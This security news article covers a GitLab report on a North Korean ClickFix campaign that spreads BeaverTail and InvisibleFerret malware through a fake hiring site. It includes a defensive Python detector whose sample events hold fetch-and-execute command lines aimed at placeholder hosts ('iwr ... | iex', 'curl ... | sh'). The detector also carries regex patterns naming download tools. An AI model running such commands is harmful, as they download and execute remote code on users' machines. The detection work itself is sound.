GitLab Threat Intelligence has published a detailed analysis of a new malware campaign linked to North Korean nation-state actors, marking a tactical evolution in how groups like Contagious Interview and Famous Chollima deploy their tools. The report, authored by Oliver Smith, sheds light on shifts in targeting, distribution, and evasion techniques.
According to the report, “We’ve identified infrastructure used to distribute BeaverTail and InvisibleFerret malware variants since at least May 2025.” Unlike past campaigns that focused primarily on software developers, this one turned its attention to new industries.
“The threat actor used ClickFix lures to target marketing and trader roles in cryptocurrency and retail sector organizations rather than targeting software development roles.” This shift suggests a broadening of objectives, likely to capture sensitive financial and operational data outside of the developer ecosystem.
Traditionally, BeaverTail has been distributed as JavaScript or Python scripts, relying on interpreters already present on target systems. However, GitLab’s research highlights a notable change: “The threat actor’s malware was compiled into executables rather than typical distribution as scripts reliant on interpreters already present on target systems.”
This move makes the malware more portable and harder to detect, especially on systems where standard interpreters are missing. The compiled versions were also observed to have low detection rates on VirusTotal, raising concerns about their stealth and persistence.
The attack leverages the ClickFix technique, a form of social engineering where fake CAPTCHAs or troubleshooting instructions are used to trick victims into running malicious commands. The GitLab team documented how the lure was embedded into a fake hiring platform, complete with job postings for cryptocurrency traders, marketing roles, and even investment opportunities.
Visitors were prompted to record a video response during the fake application process, only to encounter fabricated technical errors that guided them into executing system-specific commands. These commands fetched and installed the BeaverTail payload, and in some cases, InvisibleFerret, a second-stage Python-based information stealer and remote access tool.
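The execution step described above, where a victim is talked into pasting a command that fetches and installs the payload, is the point a defender can most readily observe. The following is an added example, not code from the GitLab report or from this article: a small heuristic scorer run over constructed process-creation records. It assumes an event layout with parent image, image and command line, and it assumes (from general ClickFix reporting, not from this page) that the pasted command typically runs under an interactive shell or the desktop shell and downloads remote content straight into an interpreter. Host names, users and command lines are constructed for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Assumed (constructed) field layout of a process-creation event."""
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Parents a user would be typing into after following a ClickFix lure
# (Run dialog launches under explorer.exe; terminal pastes under a shell).
# This is an assumption about typical ClickFix flows, not from the report.
INTERACTIVE_PARENTS = {
    "explorer.exe", "cmd.exe", "powershell.exe",
    "terminal", "bash", "zsh", "sh",
}

# Command lines that fetch remote content.
REMOTE_FETCH = re.compile(
    r"(?i)\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex|"
    r"DownloadString|bitsadmin|certutil\s+-urlcache)\b"
)
# Fetched content piped directly into an interpreter or shell.
PIPE_TO_EXEC = re.compile(
    r"(?i)\|\s*(sh|bash|zsh|python3?|powershell|pwsh|iex|Invoke-Expression)\b"
)
# Flags commonly used to hide or obscure the execution.
EVASION_FLAGS = re.compile(
    r"(?i)-(w|windowstyle)\s*hidden|-enc(odedcommand)?\b|--nohup|-ep\s*bypass"
)


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return a heuristic score and the reasons that fired (higher = more suspicious)."""
    score, reasons = 0, []
    if ev.parent_image.lower() in INTERACTIVE_PARENTS:
        score += 1
        reasons.append(f"launched interactively under {ev.parent_image}")
    if REMOTE_FETCH.search(ev.command_line):
        score += 2
        reasons.append("fetches remote content")
    if PIPE_TO_EXEC.search(ev.command_line):
        score += 2
        reasons.append("pipes fetched content into an interpreter")
    if EVASION_FLAGS.search(ev.command_line):
        score += 1
        reasons.append("uses hidden/encoded execution flags")
    return score, reasons


def flag_clickfix_candidates(events, threshold: int = 4):
    """Return (host, score, reasons) for events at or above the threshold, highest first.
    A lone remote fetch (score 3) stays below the threshold so ordinary developer
    curl usage is not flagged; fetch-and-execute from an interactive parent is."""
    hits = [(ev.host, *score_event(ev)) for ev in events]
    hits = [h for h in hits if h[1] >= threshold]
    return sorted(hits, key=lambda h: h[1], reverse=True)


# Constructed sample events; hosts, users and URLs are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("WS-MKT-07", "mkt.user", "explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr http://example.invalid/verify | iex"'),
    ProcessEvent("MAC-TRD-02", "trader", "Terminal", "zsh",
                 'zsh -c "curl -fsSL http://example.invalid/fix.sh | sh"'),
    ProcessEvent("WS-MKT-07", "SYSTEM", "services.exe", "svchost.exe",
                 "svchost.exe -k netsvcs"),
    ProcessEvent("WS-MKT-07", "mkt.user", "explorer.exe", "chrome.exe",
                 '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --profile-directory=Default'),
    ProcessEvent("DEV-01", "dev", "bash", "curl",
                 "curl -sS https://api.example.invalid/health"),
]

if __name__ == "__main__":
    for host, score, reasons in flag_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{host}: score={score}; " + "; ".join(reasons))
```

The scoring is deliberately additive rather than a single signature: the report notes the payloads themselves had low detection rates, so the behavioural chain (interactive parent, remote fetch, direct execution, hiding flags) is a more durable hook than any hash. Tune the parent list and threshold to the environment; the developer-host event is included to show why a remote fetch alone should not page anyone.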
Smith and his team emphasize that the campaign is still in its early stages: “We assess that this activity was likely being tested by the threat actor and related malware is unlikely to have been distributed at scale to date.”
Development artifacts and low prevalence in malware sandboxes suggest that operators are refining their techniques before launching wider operations.
The report concludes that this campaign represents more than just an incremental change. It signals a strategic push by North Korean operators to diversify their victim pool and strengthen their delivery mechanisms. “The campaign suggests a slight tactical shift for a subgroup of North Korean BeaverTail operators, expanding beyond their traditional software developer targeting to pursue marketing and trading roles across cryptocurrency and retail sectors.”